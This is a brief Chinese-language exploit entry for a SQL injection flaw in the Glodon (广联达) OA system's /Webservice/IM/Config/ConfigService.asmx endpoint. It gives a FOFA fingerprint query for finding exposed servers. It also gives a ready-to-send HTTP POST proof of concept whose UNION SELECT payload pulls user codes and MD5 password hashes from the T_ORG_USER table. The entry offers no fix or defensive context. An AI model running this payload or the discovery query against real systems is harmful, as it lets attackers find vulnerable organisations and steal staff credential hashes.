# 广联达OA系统接口ConfigService.asmx存在SQL注入漏洞 广联达OA系统接口 `/Webservice/IM/Config/ConfigService.asmx` 存在SQL注入漏洞。 ## fofa ```yaml header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx" ``` ## poc ```xml POST /Webservice/IM/Config/ConfigService.asmx HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.88 Safari/537.36 Content-Type: text/xml;charset=UTF-8 1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER -- ```